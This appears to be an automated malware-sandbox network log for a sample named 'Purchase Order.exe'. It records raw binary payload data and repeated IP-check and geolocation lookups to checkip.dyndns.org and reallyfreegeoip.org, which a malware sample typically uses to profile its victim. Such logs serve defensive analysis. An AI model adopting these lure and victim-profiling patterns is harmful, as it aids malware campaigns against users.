                                                                                                Oct 21, 2024 11:30:30.547225952 CEST1236INData Raw: a8 60 d1 dd 23 24 85 67 0f ed 5c 5c 50 82 00 8a 4b a2 3e e9 a7 97 2c f8 f6 c0 52 c0 36 1d af f0 24 39 80 07 11 32 bb 9a 47 93 de 40 43 cc 21 b5 01 9f b0 2c 72 0d 25 46 19 a3 57 e5 74 f3 d1 87 79 00 eb 67 23 22 dc 85 53 72 da d5 d5 42 f1 b5 08 2d
                                                                                                Data Ascii: `#$g\\PK>,R6$92G@C!,r%FWtyg#"SrB-9%ug0ff^Ojfu.:6-6(`3._kyF/a.s -oTsatP\_% 6wWR_"4<Ndlq}1OA
                                                                                                Oct 21, 2024 11:30:30.547240019 CEST1236INData Raw: 2f 81 80 96 46 db 41 c1 3d fe 98 80 e2 48 5e fb e6 90 e4 0a ec c5 e5 1b 41 ec 05 9a f1 e0 78 5b 0c 3a df 97 16 b7 2c 14 b4 6f 2a 67 ca ee 17 c3 21 68 00 03 52 b2 4b b9 79 b3 ac df ab 9b c2 6c ba 52 66 72 2c 40 32 4d 28 83 1b df a8 a5 53 a8 fe 46
                                                                                                Data Ascii: /FA=H^Ax[:,o*g!hRKylRfr,@2M(SF\xr-|n8&mI|@&U@M}Uw`f+P'I$aXRidnxbpRQ?zCh|O\e`QhNi,\8fy8c$1
                                                                                                Oct 21, 2024 11:30:30.547250986 CEST1236INData Raw: b1 5e 74 c0 aa a9 9f 95 ff 59 1f b1 94 3b 25 46 5e 47 82 6f 4b a0 d7 7c cd f1 f8 e4 e6 b5 58 4a ad ce bd 31 96 84 ec d8 1f ba 7f 3c a9 96 c2 58 fe f6 00 a5 8f f8 ef 56 39 3a 8c b2 77 74 46 22 59 af b3 a4 21 86 34 e4 9c 41 b9 2c 17 c7 00 8e 28 b6
                                                                                                Data Ascii: ^tY;%F^GoK|XJ1<XV9:wtF"Y!4A,(_\.{y}NVcs-=9& +;?Zn8doupPN%2~3G3X|YB&|Mo7G-^zU+\tX9;4!\hW'g|
                                                                                                Oct 21, 2024 11:30:30.547262907 CEST1236INData Raw: 15 89 db f0 f7 41 68 1a 87 40 d7 57 c4 bc 00 9c 30 51 69 e6 24 77 f8 d2 79 6d 15 91 e9 6b 36 e4 70 c2 a0 d9 3f df ab a9 8d c1 f2 b3 a6 ce 73 29 40 41 85 af 31 de 75 fc 37 c0 88 97 04 1e 2e 14 9d ec 45 93 ab 30 19 62 76 00 55 dc 93 b8 2c 29 24 3a
                                                                                                Data Ascii: Ah@W0Qi$wymk6p?s)@A1u7.E0bvU,)$:.R$;-l1]_Q2+)JF,*8?K8-i>^'}\+bcgitYkwc@G(mlnBmv6D5Xn)V\$`!\#D
                                                                                                Oct 21, 2024 11:30:30.547357082 CEST1060INData Raw: c0 73 d1 d7 2e 37 2c 95 0f 88 fb 28 a2 69 31 66 f1 ad 80 57 98 dc b5 2e 26 33 a3 77 83 d8 04 13 80 a2 13 19 52 b5 4a ab 91 2c f0 c3 c5 9a 28 c0 6c 2f 08 06 01 8f 16 3b 17 de 0d e0 ca a1 0b d1 f9 2f 58 93 14 00 36 87 08 cf 15 c2 65 95 d4 de ac b3
                                                                                                Data Ascii: s.7,(i1fW.&3wRJ,(l/;/X6e5UyfPyVDr|;:+6by,OA0sc+/:{,d!\Q<F7vFpe.{hc?g}HK6V|wXL}~"9(HR


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549976193.122.130.0803340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 21, 2024 11:30:33.046765089 CEST151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Oct 21, 2024 11:30:33.715333939 CEST323INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:33 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 106
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: e92251fe081a10bd4eed4c08900fdf62
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
                                                                                                Oct 21, 2024 11:30:33.719268084 CEST127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Oct 21, 2024 11:30:35.875432968 CEST730INHTTP/1.1 502 Bad Gateway
                                                                                                Date: Mon, 21 Oct 2024 09:30:35 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 547
                                                                                                Connection: keep-alive
                                                                                                X-Request-ID: e412a16d97170baeb005adc2578140c1
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                Oct 21, 2024 11:30:35.994040966 CEST127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Oct 21, 2024 11:30:38.151431084 CEST730INHTTP/1.1 502 Bad Gateway
                                                                                                Date: Mon, 21 Oct 2024 09:30:38 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 547
                                                                                                Connection: keep-alive
                                                                                                X-Request-ID: b7cc3054e6217e789d216f9ad72e7896
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                Oct 21, 2024 11:30:38.155378103 CEST127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Oct 21, 2024 11:30:38.328026056 CEST323INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:38 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 106
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 2ad853c130a679424400a9ebf91acb41
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
                                                                                                Oct 21, 2024 11:30:39.647559881 CEST127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Oct 21, 2024 11:30:39.986489058 CEST323INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:39 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 106
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: de5864ab80c8ca587b9c8454abbe64b7
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549979193.122.130.0803340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 21, 2024 11:30:40.749135971 CEST127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Oct 21, 2024 11:30:41.406460047 CEST323INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:41 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 106
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 848176bbedba5d7bef065554f33a9d58
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549981193.122.130.0803340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 21, 2024 11:30:42.166743040 CEST127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Oct 21, 2024 11:30:44.844923973 CEST730INHTTP/1.1 502 Bad Gateway
                                                                                                Date: Mon, 21 Oct 2024 09:30:44 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 547
                                                                                                Connection: keep-alive
                                                                                                X-Request-ID: 86c0d4888de24f120fa3a0613bf614e7
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549982193.122.130.0803340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 21, 2024 11:30:44.855762959 CEST151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Oct 21, 2024 11:30:46.230880022 CEST323INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:46 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 106
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 49619a9c7d79fc12d5b3f0fe1936f3a0
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549984193.122.130.0803340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 21, 2024 11:30:46.995786905 CEST151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Oct 21, 2024 11:30:48.290724039 CEST323INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:48 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 106
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 21b387470737ce7c04fa52b074e54280
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549986193.122.130.0803340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 21, 2024 11:30:49.069955111 CEST151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Oct 21, 2024 11:30:51.695322037 CEST323INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:51 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 106
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 1089645dde8ac563cb74f30bb2bc385c
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549977188.114.97.34433340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-21 09:30:39 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-21 09:30:39 UTC896INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:39 GMT
                                                                                                Content-Type: application/xml
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                access-control-allow-origin: *
                                                                                                vary: Accept-Encoding
                                                                                                Cache-Control: max-age=86400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28704
                                                                                                Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BlZ5fBtHwOTFp3cCgdqin%2FgxrcrYzUd8TAK%2BtbAXP5LJqYKqOMYVJEZA%2B4dUuOO72sseP040J7N0jetQ8Q3XVN7l1bAdimIgZdwk1zUWRxHp52C7u2EoePBawynUHd5UnEbTy6ma"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d603aed48596b94-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1072&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2683966&cwnd=251&unsent_bytes=0&cid=90598d342631fa25&ts=400&x=0"
                                                                                                2024-10-21 09:30:39 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                                Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                                2024-10-21 09:30:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549978188.114.97.34433340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-21 09:30:40 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                2024-10-21 09:30:40 UTC892INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:40 GMT
                                                                                                Content-Type: application/xml
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                access-control-allow-origin: *
                                                                                                vary: Accept-Encoding
                                                                                                Cache-Control: max-age=86400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28705
                                                                                                Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EWdGiExe7pSqgNqDI2ZjwbICLm433Fws82CzMdNNgVhETqvtFWvzVs1f%2FrSyz9sKxuWVBfMvzGrIe9JA2%2BFUxer9aYjMcJ5yfqEIIlv5muldBqCOGuvaqfY3ojVEY3F3woYyw22Q"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d603af42865ddb0-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1200&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2397350&cwnd=252&unsent_bytes=0&cid=59ee70fbad56a2ac&ts=143&x=0"
                                                                                                2024-10-21 09:30:40 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                                Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                                2024-10-21 09:30:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549980188.114.97.34433340C:\Users\user\Desktop\Purchase Order.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-21 09:30:42 UTC63OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                2024-10-21 09:30:42 UTC896INHTTP/1.1 200 OK
                                                                                                Date: Mon, 21 Oct 2024 09:30:42 GMT
                                                                                                Content-Type: application/xml
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                access-control-allow-origin: *
                                                                                                vary: Accept-Encoding
                                                                                                Cache-Control: max-age=86400
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28707
                                                                                                Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BR69Jg2%2FgQZ9OSt70ivAi9WHopIH7E8ptGGxJy5TJ6HRmx0OVPLKNvNgbb7gJnoiKIHVp2H6ChKMQuYhmRTX5gAntpt1%2FAYt0mr%2BisLB0Pjfkaf6ldPzi3LdAnY3%2BG2nW6T7CNjl"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d603afd0b3c4689-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
